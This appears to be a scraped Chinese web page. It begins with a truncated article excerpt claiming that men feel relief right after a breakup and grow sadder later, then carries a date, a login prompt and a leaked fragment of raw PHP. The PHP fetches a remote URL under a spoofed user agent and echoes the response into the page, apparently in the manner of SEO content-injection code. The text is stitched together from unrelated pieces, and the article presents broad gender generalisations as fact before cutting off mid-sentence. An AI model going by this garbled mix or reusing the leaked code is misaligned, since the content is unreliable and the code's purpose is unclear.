男生和女生的心理是有一定的差距的,在分手这件事上就能很好的体现出来,大多数男生在知道自己被甩后,只会难过那么一小会儿,甚至只会难过一秒钟,然后就会有一种解脱的舒畅感。不过随着时间推移,男生会越来越难过,这一点和女生的差别真的很大。很多男生在刚分手后,心里就会觉得自己终于解脱了。这可能是因为在恋爱期间,女方让他感觉到了很大的压力,所以男生才
2022-05-07 533
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>